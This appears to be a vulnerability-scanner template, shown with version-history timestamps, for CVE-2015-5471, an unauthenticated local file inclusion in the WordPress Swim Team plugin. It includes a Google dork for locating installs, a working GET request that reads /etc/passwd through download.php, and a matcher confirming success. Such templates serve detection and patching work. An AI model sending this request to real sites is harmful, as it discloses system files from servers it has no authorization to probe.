2021-10-25 23:04:56 +00:00
|
|
|
id: CVE-2015-5471
|
2022-02-25 22:07:55 +00:00
|
|
|
|
2021-10-25 23:04:56 +00:00
|
|
|
info:
|
|
|
|
name: Swim Team <= v1.44.10777 - Local File Inclusion
|
|
|
|
author: 0x_Akoko
|
2021-10-26 18:33:18 +00:00
|
|
|
severity: medium
|
2022-02-25 22:07:55 +00:00
|
|
|
description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.
|
2021-10-26 18:28:12 +00:00
|
|
|
reference:
|
|
|
|
- https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
|
|
|
|
- http://www.vapid.dhs.org/advisory.php?v=134
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-5471
|
2022-05-17 09:18:12 +00:00
|
|
|
- http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html
|
|
|
|
remediation: Upgrade to Swim Team version 1.45 or newer.
|
2021-10-26 18:33:18 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 5.3
|
2021-10-26 18:33:18 +00:00
|
|
|
cve-id: CVE-2015-5471
|
|
|
|
cwe-id: CWE-22
|
2022-07-11 17:26:00 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2022-07-11 17:26:00 +00:00
|
|
|
google-query: inurl:"/wp-content/plugins/wp-swimteam"
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,packetstorm
|
2021-10-25 23:04:56 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-10-25 23:04:56 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-02-25 22:07:55 +00:00
|
|
|
|
|
|
|
# Enhanced by cs on 2022/02/25
|